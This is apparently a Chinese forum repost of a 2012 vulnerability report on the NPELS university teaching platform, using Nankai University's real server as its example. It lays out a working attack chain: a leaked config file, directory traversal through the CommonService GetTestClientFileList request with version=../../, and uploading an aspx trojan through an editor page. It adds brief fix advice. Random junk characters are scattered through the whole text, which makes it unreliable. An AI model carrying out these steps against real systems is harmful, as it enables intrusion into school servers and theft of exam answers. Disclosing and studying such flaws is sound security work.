好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中
, ~' F" a. W% Y8 i- U- t' E& i& l3 O' u6 R
详细说明:
8 |8 O" A6 p* `! A# ` z, G 6 m0 e) E+ S! \3 E, V% ~9 _
以南开大学的为例:
" G$ r4 L% \+ r" p3 Ehttp://222.30.60.3/NPELS: J3 j8 ~6 d- b7 u# c) F
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址* {; ^9 a+ Y/ s
<setting name="Update_CommonSvr_CommonService" serializeAs="String"> ~ b' V p, T3 }- Z& y
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>; { z8 ]! ?: S3 J
</setting>& t3 [# A/ }+ L c! W3 x0 R1 L
及版本号
! K& T5 H0 s1 K2 ^3 ^<add key="TVersion" value="1, 0, 0, 2187">! u5 ~/ z# l) j; R. m
</add>6 ~" X4 N* L) X+ w' |5 K
直接访问4 m4 m$ o& Y6 f
http://222.30.60.3/NPELS/CommonService.asmx
! y) B, F) D. I7 C使用GetTestClientFileList操作,直接 HTTP GET 列目录:
9 o" j8 [% O/ N* @- n" phttp://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187# q$ U W( W+ k
进一步列目录(返回的网页很大,可以直接 wget 下来)
# r& _: S: z6 r5 ]3 J7 Dhttp://222.30.60.3/NPELS/CommonS ... List?version=../../
5 i w+ n5 E( Z d4 X 1 _1 L& M1 R' e- H
发现
9 b d: w5 P* f6 S( \$ Ahttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm' ?* J# x3 n- `" G) g! X% ]; a1 b3 H
可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头& W1 p4 Q& Q+ {1 f* L
上传后继续列目录找到木马地址直接访问即可4 O4 E1 p$ G ~9 D& S
4 G9 ^2 X, t9 K N+ d; l8 Q% n7 \OOXX8 @5 M6 Y' R- O$ o: T
. i3 D8 o) N# \1 D: x
Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法3 }3 n+ Z2 A3 _6 }/ \. [
漏洞证明:$ Y3 b9 w2 M g0 K
/ r7 O& O' O4 R5 k, K5 [列目录:
+ k M$ S, T. i& |+ k+ E- nhttp://222.30.60.3/NPELS/CommonS ... List?version=../../
: S4 e" k6 z) j8 z% d文件上传:" d; l7 @9 P) F) H
http://222.30.60.3/npelsv/editor/editor.htm& G8 V5 D1 }1 D2 O
8 h4 w* g4 V5 u% H上传木马:- U9 b/ b* D1 U: B1 w9 g
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx0 ?( U5 R! V H$ T8 q% T2 j- |% E, Y' e
4 A j- Y( }9 M: _& ^4 f
修复方案:& v! [0 k% S& E! ~; L! w
好像考试系统必须使用 CommonService.asmx
9 U1 s0 P" b9 S8 \9 G( V9 p最好配置文件加密或者用别的方式不让它泄露出来+ G" f1 \% h. M3 L% X
并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样7 W8 M' j$ z4 b3 O$ x# P; p
|
发表于 2012-12-4 11:10:29
收藏
支持
反对